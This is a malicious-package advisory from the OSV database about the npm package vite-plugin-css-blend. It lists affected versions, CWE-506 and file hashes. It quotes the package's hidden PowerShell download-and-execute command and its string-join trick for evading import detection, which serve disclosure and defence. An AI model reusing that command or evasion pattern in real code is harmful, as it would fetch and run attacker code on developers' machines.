MAL-2026-4706

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-plugin-css-blend/MAL-2026-4706.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4706
Published
2026-05-24T17:15:49Z
Modified
2026-05-26T06:03:02.856741506Z
Summary
Malicious code in vite-plugin-css-blend (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (7a47fa75fbd028d1aca89ca790036f760c76d8e486175505ef4a8f59f33e7c76)

The package is published as a Vite CSS plugin but exposes no Vite plugin API. Its documented applyGlobalStyles({palette, accents}) export, when called on Windows, treats the caller-supplied accents and palette strings as an AES-256-CBC IV and ciphertext, decrypts them with a hardcoded key, and spawns powershell.exe -WindowStyle Hidden -NoProfile -Command "irm <decrypted-url> -o $env:TEMP\s.js; node $env:TEMP\s.js" — fetching and executing an attacker-controlled JavaScript payload via Node. The node:crypto and node:child_process modules are imported via string-array join (["no","de",":","cry","pto"].join(""), ["no","de",":","chi","ld","_pro","cess"].join("")) to evade static import detection. The package further ships ~200 numbered no-op exports (e.g., isWithinBoundary1..200, applyPreset1..150, createSequenceStep1..250) as filler to camouflage the malicious export among legitimate-looking utilities, and its name baits developers searching the Vite ecosystem. Any consumer following the documented API on a Windows host triggers download-and-execute of arbitrary remote code.

Database specific 
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-004520",
            "import_time": "2026-05-26T05:52:45.958440733Z",
            "source": "amazon-inspector",
            "versions": [
                "1.0.0"
            ],
            "modified_time": "2026-05-24T17:15:49Z",
            "sha256": "7a47fa75fbd028d1aca89ca790036f760c76d8e486175505ef4a8f59f33e7c76"
        }
    ]
}
References
Credits

Affected packages

npm / vite-plugin-css-blend

Package

Name
vite-plugin-css-blend
View open source insights on deps.dev
Purl
pkg:npm/vite-plugin-css-blend

Affected ranges

Affected versions

1.*
1.0.0

Database specific

cwes 
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
source 
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-plugin-css-blend/MAL-2026-4706.json"
indicators 
{
    "package_integrity": [
        {
            "filename": "vite-plugin-css-blend-1.0.0.tgz",
            "hashes": {
                "sha1": "ba0320dec92a685a5a9ab6c00b33002cca7dba9f",
                "sha512_sri": "sha512-jS+E8kmq4UNZjCMf3vl7zW7oAuFs1Ii0gftpuMnCJJ5n2Qm2xLUUEnkY0SxWY7/CFWwYlYSDC3oOh9b/cwTQDw=="
            }
        }
    ],
    "evidence_files": [
        {
            "path": "dist/index.js",
            "sha256": "e8113412636bd5c602bc9cdd9f4f989947d8271899da7963a0411830b966f1ad",
            "tlsh": "e9c3ffcab1a23132d32b686048bf018bf377dda0177e4481d159a2adb63441ea5b7f7d"
        },
        {
            "path": "package.json",
            "sha256": "adb2dcdf06ad36894d9eb5eac3659a71a1a05c4fcb4636743b28c552d2437b95",
            "tlsh": "32012b308520482307d90573aca81643aaa58d6f5644bc08379e402c4bde6ab41fe77d"
        }
    ]
}